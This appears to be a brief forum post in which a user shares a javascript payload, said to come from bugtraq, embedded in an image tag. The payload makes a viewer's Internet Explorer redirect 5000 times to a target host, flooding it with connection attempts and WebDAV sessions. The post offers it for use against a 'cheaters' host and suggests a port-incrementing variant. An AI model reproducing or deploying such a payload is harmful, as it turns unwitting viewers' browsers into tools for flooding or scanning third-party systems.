TheHun, here's a lil snippet of code that was posted on bugtraq some days ago, You might find it usefull ;) ...
[IMG src="javascript"for (i = 1; i <= 5000; i++) {window.location.replace ('file:////www.cheatershost.com/')};')"]
The target will receive a large number connection attempts on port 80. If
port 80 is open on the target IE will also attempt to initiate a WebDAV
session for each request. Resulting in more traffic to the target.
Another way to accomplish this is to use the same peice of javascript but use
http://cheatersip: and increment port numbers with the loop.
Cheers,
extreme